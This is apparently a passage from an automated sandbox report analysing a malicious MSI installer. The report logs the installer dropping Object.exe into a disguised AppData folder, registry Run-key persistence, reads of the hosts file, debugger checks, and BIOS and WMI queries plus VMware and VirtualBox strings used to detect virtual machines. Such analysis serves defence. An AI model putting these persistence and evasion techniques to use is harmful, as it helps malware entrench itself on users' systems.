Source: Object.exeString found in binary or memory: NATS-DANO-ADD
Source: Object.exeString found in binary or memory: jp-ocr-b-add
Source: Object.exeString found in binary or memory: JIS_C6229-1984-b-add
Source: Object.exeString found in binary or memory: jp-ocr-hand-add
Source: Object.exeString found in binary or memory: JIS_C6229-1984-hand-add
Source: Object.exeString found in binary or memory: ISO_6937-2-add
Source: Object.exeString found in binary or memory: NATS-SEFI-ADD
Source: Object.exeString found in binary or memory: NATS-DANO-ADD
Source: Object.exeString found in binary or memory: jp-ocr-b-add
Source: Object.exeString found in binary or memory: JIS_C6229-1984-b-add
Source: Object.exeString found in binary or memory: JIS_C6229-1984-hand-add
Source: Object.exeString found in binary or memory: jp-ocr-hand-add
Source: Object.exeString found in binary or memory: ISO_6937-2-add
Source: Object.exeString found in binary or memory: NATS-SEFI-ADD
Source: Object.exeString found in binary or memory: NATS-DANO-ADD
Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeWindow found: window name: TButtonJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
Source: RT.msiStatic file information: File size 2307584 > 1048576
Source: Binary string: D:\Build.Agent\TeamAgent\_work\1\s\Build\0\ScanMan\ScanMan\ScanWia\WinFinal\ScanWia.pdb source: Object.exe, 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp, Object.exe, 00000010.00000000.327506183.00000000004F0000.00000002.00020000.sdmp, Object.exe, 00000014.00000000.363719608.00000000004F0000.00000002.00020000.sdmp, Object.exe, 00000014.00000002.553587432.00000000004F0000.00000002.00020000.sdmp, Object.exe, 00000016.00000000.381050874.00000000004F0000.00000002.00020000.sdmp, Object.exe, 00000016.00000002.554030651.00000000004F0000.00000002.00020000.sdmp, Object.exe.10.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdba source: RT.msi, MSI77C2.tmp.4.dr, MSI74A2.tmp.4.dr, 4c6e29.msi.4.dr, MSI759D.tmp.4.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\FileOperations.pdba source: RT.msi, MSIAF72.tmp.4.dr, MSI7B7E.tmp.4.dr, 4c6e2b.rbs.4.dr, MSI7A16.tmp.4.dr, 4c6e29.msi.4.dr, MSI79B7.tmp.4.dr, MSI7FC6.tmp.4.dr
Source: Binary string: D:\Build.Agent\TeamAgent\_work\1\s\Build\0\ScanMan\ScanMan\ScanWia\WinFinal\ScanWia.pdb source: Object.exe, 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp, Object.exe, 00000010.00000000.327506183.00000000004F0000.00000002.00020000.sdmp, Object.exe, 00000014.00000000.363719608.00000000004F0000.00000002.00020000.sdmp, Object.exe, 00000014.00000002.553587432.00000000004F0000.00000002.00020000.sdmp, Object.exe, 00000016.00000000.381050874.00000000004F0000.00000002.00020000.sdmp, Object.exe, 00000016.00000002.554030651.00000000004F0000.00000002.00020000.sdmp, Object.exe.10.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: RT.msi, MSI7689.tmp.4.dr, 4c6e29.msi.4.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\FileOperations.pdb source: RT.msi, MSIAF72.tmp.4.dr, MSI7B7E.tmp.4.dr, 4c6e2b.rbs.4.dr, MSI7A16.tmp.4.dr, 4c6e29.msi.4.dr, MSI79B7.tmp.4.dr, MSI7FC6.tmp.4.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb+ source: MSIBA90.tmp, 0000000E.00000000.325846490.0000000000FB8000.00000002.00020000.sdmp, MSIBA90.tmp, 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp, RT.msi, MSIBA90.tmp.4.dr, 4c6e29.msi.4.dr
Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2h-x32\out32dll\ssleay32.pdb source: Object.exe, 00000010.00000002.560666792.000000001203E000.00000002.00020000.sdmp, Object.exe, 00000014.00000002.560460264.000000001203E000.00000002.00020000.sdmp, Object.exe, 00000016.00000002.560575507.000000001203E000.00000002.00020000.sdmp, ssleay32.dll.10.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: RT.msi, MSI77C2.tmp.4.dr, MSI74A2.tmp.4.dr, 4c6e29.msi.4.dr, MSI759D.tmp.4.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSIBA90.tmp, 0000000E.00000000.325846490.0000000000FB8000.00000002.00020000.sdmp, MSIBA90.tmp, 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp, RT.msi, MSIBA90.tmp.4.dr, 4c6e29.msi.4.dr
Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2h-x32\out32dll\libeay32.pdbl source: Object.exe, 00000010.00000002.560518436.00000000110E6000.00000002.00020000.sdmp, Object.exe, 00000014.00000002.560348876.00000000110E6000.00000002.00020000.sdmp, Object.exe, 00000016.00000002.560440673.00000000110E6000.00000002.00020000.sdmp
Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2h-x32\out32dll\libeay32.pdb source: Object.exe, 00000010.00000002.560518436.00000000110E6000.00000002.00020000.sdmp, Object.exe, 00000014.00000002.560348876.00000000110E6000.00000002.00020000.sdmp, Object.exe, 00000016.00000002.560440673.00000000110E6000.00000002.00020000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdbV source: RT.msi, MSI7689.tmp.4.dr, 4c6e29.msi.4.dr
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00FB388C push ecx; ret 14_2_00FB389F
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00F81866 push ecx; ret 14_2_00F81879
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_004BA776 push ecx; ret 16_2_004BA789
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_004BA776 push ecx; ret 20_2_004BA789
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_004BA776 push ecx; ret 22_2_004BA789
Source: Oleacc.dll.10.drStatic PE information: section name: .didata

Persistence and Installation Behavior:

barindex
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSIBA90.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7B7E.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7FC6.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI74A2.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\ssleay32.dllJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\libeay32.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI71A4.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7689.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBA90.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Oleacc.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAF72.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI77C2.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7A16.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI759D.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7B7E.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7FC6.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI74A2.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI71A4.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7689.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBA90.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAF72.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI77C2.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7A16.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI759D.tmpJump to dropped file
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Object.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Object.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_00442490 TlsGetValue,TlsSetValue,GetLastActivePopup,IsIconic,IsWindowVisible,TlsSetValue,16_2_00442490
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_00435F80 IsWindow,IsIconic,16_2_00435F80
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_00442490 TlsGetValue,TlsSetValue,GetLastActivePopup,IsIconic,IsWindowVisible,TlsSetValue,20_2_00442490
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_00442490 TlsGetValue,TlsSetValue,GetLastActivePopup,IsIconic,IsWindowVisible,TlsSetValue,22_2_00442490
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7B7E.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7FC6.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI74A2.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIAF72.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI77C2.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI759D.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_00497220 GetSystemInfo,GetSystemInfo,GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,GetLastError,16_2_00497220
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_0048A3B0 FindFirstFileW,GetLastError,InterlockedDecrement,16_2_0048A3B0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_0048B820 SetErrorMode,SetErrorMode,SetErrorMode,FindFirstFileW,SetErrorMode,FindClose,16_2_0048B820
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_0048BB30 SetErrorMode,SetErrorMode,SetErrorMode,FindFirstFileW,SetErrorMode,FindClose,CreateFileW,CloseHandle,16_2_0048BB30
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_00478BF0 InterlockedDecrement,InterlockedIncrement,FindFirstFileW,InterlockedDecrement,InterlockedIncrement,FindClose,InterlockedIncrement,InterlockedDecrement,16_2_00478BF0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_0048A3B0 FindFirstFileW,GetLastError,InterlockedDecrement,20_2_0048A3B0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_00478BF0 InterlockedDecrement,InterlockedIncrement,FindFirstFileW,InterlockedDecrement,InterlockedIncrement,FindClose,InterlockedIncrement,InterlockedDecrement,20_2_00478BF0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_0048B820 SetErrorMode,SetErrorMode,SetErrorMode,FindFirstFileW,SetErrorMode,FindClose,20_2_0048B820
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_0048BB30 SetErrorMode,SetErrorMode,SetErrorMode,FindFirstFileW,SetErrorMode,FindClose,CreateFileW,CloseHandle,20_2_0048BB30
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_0048A3B0 FindFirstFileW,GetLastError,InterlockedDecrement,22_2_0048A3B0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_00478BF0 InterlockedDecrement,InterlockedIncrement,FindFirstFileW,InterlockedDecrement,InterlockedIncrement,FindClose,InterlockedIncrement,InterlockedDecrement,22_2_00478BF0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_0048B820 SetErrorMode,SetErrorMode,SetErrorMode,FindFirstFileW,SetErrorMode,FindClose,22_2_0048B820
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_0048BB30 SetErrorMode,SetErrorMode,SetErrorMode,FindFirstFileW,SetErrorMode,FindClose,CreateFileW,CloseHandle,22_2_0048BB30
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: 4c6e29.msi.4.drBinary or memory string: 01234567890.0.0.0.%dVMware, Inc.VMware Virtual PlatformVMware7,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IROOT\CIMV2SELECT * FROM Win32_ComputerSystemSELECT * FROM Win32_BIOSManufacturerModelVersionGetting system informationManufacturer [Model [BIOS [IsWow64Processkernel32Software\Microsoft\Windows NT\CurrentVersionSYSTEM\CurrentControlSet\Control\ProductOptionsCurrentMajorVersionNumberCurrentMinorVersionNumberCurrentVersionCurrentBuildNumberReleaseIdCSDVersionProductTypeProductSuiteWinNTServerNTSmall BusinessEnterpriseBackOfficeCommunicationServerTerminal ServerSmall Business(Restricted)EmbeddedNTDataCenterPersonalBladeEmbedded(Restricted)Security ApplianceStorage ServerCompute ServerFailed to create IWbemLocator object. Error code: Could not connect to WMI provider. Error code: Failed to initialize security. Error code: Could not set proxy blanket. Error code: WQLWMI Query failed: []. Error code: Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirection
Source: iexplore.exe, 00000012.00000002.358117318.00000205552FF000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00F98BDE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00F98BDE
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_0041EC00 OutputDebugStringA,GetLastError,16_2_0041EC00
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00F72170 GetProcessHeap,14_2_00F72170
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00FA90B9 mov eax, dword ptr fs:[00000030h]14_2_00FA90B9
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00FA255E mov eax, dword ptr fs:[00000030h]14_2_00FA255E
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_004CA9A4 mov eax, dword ptr fs:[00000030h]16_2_004CA9A4
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_004CA9A4 mov eax, dword ptr fs:[00000030h]20_2_004CA9A4
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_004CA9A4 mov eax, dword ptr fs:[00000030h]22_2_004CA9A4
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIBA90.tmp C:\Windows\Installer\MSIBA90.tmp" /DontWait "C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeJump to behavior
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00F811C4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00F811C4
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00F98BDE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00F98BDE
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00F8161A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00F8161A
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_004BE2B9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_004BE2B9
